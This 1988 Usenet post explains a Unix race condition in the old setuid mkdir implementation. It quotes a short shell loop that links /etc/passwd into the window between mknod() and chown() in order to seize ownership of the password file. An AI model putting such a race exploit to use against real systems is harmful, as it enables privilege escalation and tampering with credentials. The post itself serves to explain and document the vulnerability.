Xref: utzoo news.sysadmin:1873 news.admin:4220 Path: utzoo!utgpu!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!cwjcc!hal!nic.MR.NET!tank!mimsy!dftsrv!ames!amdcad!sun!pitstop!sundc!seismo!uunet!mcvax!hp4nl!botter!star.cs.vu.nl!maart From: maart@cs.vu.nl (Maarten Litmaath) Newsgroups: news.sysadmin,news.admin Subject: Re: security hole Keywords: security, bug Message-ID: <1777@solo11.cs.vu.nl> Date: 7 Dec 88 02:11:17 GMT References: <1191@altger.UUCP> Organization: V.U. Informatica, Amsterdam, the Netherlands Lines: 24 blue@altger.UUCP (blue) writes: \ while true \ do \ nice -39 mkdir foo & \ rm -rf foo \ ln /etc/passwd foo; rm -fr foo & \ ls -l /etc/passwd \ done This is precisely why nowadays there's a mkdir() system call! Formerly the mkdir scheme was as follows: mknod(path, S_IFDIR, dev); /* now the directory exists, its owner is root and it's empty */ chown(path, uid, gid); /* now the owner is set */ chdir(path); link(path, "."); /* make entry `.' in new directory */ link(parent, ".."); /* make entry `..' */ The `rm -rf foo; ln /etc/passwd foo' must `hit' right AFTER the mknod(), but BEFORE the chown(). Due to race conditions this scheme will eventually succeed. -- fcntl(fd, F_SETFL, FNDELAY): |Maarten Litmaath @ VU Amsterdam: let's go weepin' in the corner! |maart@cs.vu.nl, mcvax!botter!maart